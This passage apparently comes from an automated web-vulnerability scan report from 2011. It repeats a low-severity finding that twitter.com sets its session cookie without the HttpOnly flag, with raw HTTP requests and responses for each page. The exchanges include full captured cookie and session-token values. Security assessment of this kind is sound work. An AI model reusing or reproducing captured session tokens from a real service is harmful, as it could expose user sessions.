Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-47321-52923
ETag: "e18f995e42882bc3925d1122528b563b"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.01113
Content-Type: text/html; charset=utf-8
Content-Length: 47275
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.173. http://twitter.com/slaterusa/status/28450023532396544

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /slaterusa/status/28450023532396544

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /slaterusa/status/28450023532396544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-9032-41579
ETag: "2d649e661e9650b58e26ecd35a90c033"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.06669
Content-Type: text/html; charset=utf-8
Content-Length: 13654
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vc2xhdGVydXNh%250AL3N0YXR1cy8yODQ1MDAyMzUzMjM5NjU0NDoMY3NyZl9pZCIlMTFkMDY1ODkx%250AZmIzMTRjNTM4NzA5ZWFmNDcwOGFkNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--aa39b3f6965406bbcece36f3eda8aef0cfd70c30; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.174. http://twitter.com/statuses/user_timeline/14594657.rss

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /statuses/user_timeline/14594657.rss

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /statuses/user_timeline/14594657.rss HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224736-11803-53712
X-RateLimit-Limit: 150
ETag: "d9f15add89742f23e51649d51653ea0c"
Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT
X-RateLimit-Remaining: 145
X-Runtime: 0.03892
X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 12107
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1296227305
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:georss="http://www.georss.org/georss" xmlns:twitter="http://api.twitter.com">
<channel>
<
...[SNIP]...

11.175. http://twitter.com/stubbornella

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /stubbornella

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /stubbornella HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-17908-9667
ETag: "c8f4f53596f1bb2e5586d7d17efcc5c7"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01178
Content-Type: text/html; charset=utf-8
Content-Length: 53443
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.176. http://twitter.com/thehomeorg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /thehomeorg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thehomeorg HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:47:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265643-97614-35318
ETag: "131b1fb1d163bdaa604bee260ed9d1f1"
Last-Modified: Sat, 29 Jan 2011 01:47:23 GMT
X-Runtime: 0.01375
Content-Type: text/html; charset=utf-8
Content-Length: 53580
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.177. http://twitter.com/tos

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /tos

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tos HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225079-3564-32486
ETag: "735f941540ad8cdd9d04c136eca0b0ca"
Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT
X-Runtime: 0.05573
Content-Type: text/html; charset=utf-8
Content-Length: 30493
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYTVmY2EyMDkzM2Y2ZWRjNTgyZmQ3ZDA5ZDQwYWE1%250AMDY6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--2b07f7d8732d93af6476b2abb8e4dcef9120730e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.178. http://twitter.com/townsandtrails

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /townsandtrails

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /townsandtrails HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225028-55890-31920
ETag: "8cefd1f1479aaa09aab96f1e9191b50f"
Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT
X-Runtime: 0.01466
Content-Type: text/html; charset=utf-8
Content-Length: 50670
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.179. http://twitter.com/travis

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /travis

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /travis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225035-81767-49969
ETag: "87ddebc7da76c7d19a026c1d7f912c12"
Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT
X-Runtime: 0.01393
Content-Type: text/html; charset=utf-8
Content-Length: 56939
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.180. http://twitter.com/tylerseguin92

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /tylerseguin92

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tylerseguin92 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266036-23768-37977
ETag: "259dab0c6ed9a5201ee9cf6df844e230"
Last-Modified: Sat, 29 Jan 2011 01:53:56 GMT
X-Runtime: 0.01340
Content-Type: text/html; charset=utf-8
Content-Length: 21949
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.181. http://twitter.com/waynecountylife

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /waynecountylife

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /waynecountylife HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225036-43124-3354
ETag: "04a252192aa79528cad7c5c11d3825f3"
Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT
X-Runtime: 0.35094
Content-Type: text/html; charset=utf-8
Content-Length: 54878
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIidodHRwOi8vdHdpdHRlci5jb20vd2F5bmVjb3Vu%250AdHlsaWZlOgxjc3JmX2lkIiUyZDVjNDY0MjVjZjk4MWU0NDI1ZGZkZWI1OTNl%250ANDIxYzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--90d7bcbfc68d4b17546f6b6e6696899149d482a7; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.182. http://twitter.com/webandy

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /webandy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webandy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224919-86126-59712
ETag: "072bd7c69249b014a8eea541d0e13ce7"
Last-Modified: Fri, 28 Jan 2011 14:28:39 GMT
X-Runtime: 0.46070
Content-Type: text/html; charset=utf-8
Content-Length: 51273
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIh9odHRwOi8vdHdpdHRlci5jb20vd2ViYW5keToM%250AY3NyZl9pZCIlMzU4ODlhZDFhNTVmNjY2ODliNTc5MzYzYjlkMzVmNjc6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--69ca8ae41a9f970b1732fe7d2a927b6f2859758a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.183. http://twitter.com/webandy/status/30434889127960577

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /webandy/status/30434889127960577

Issue detail

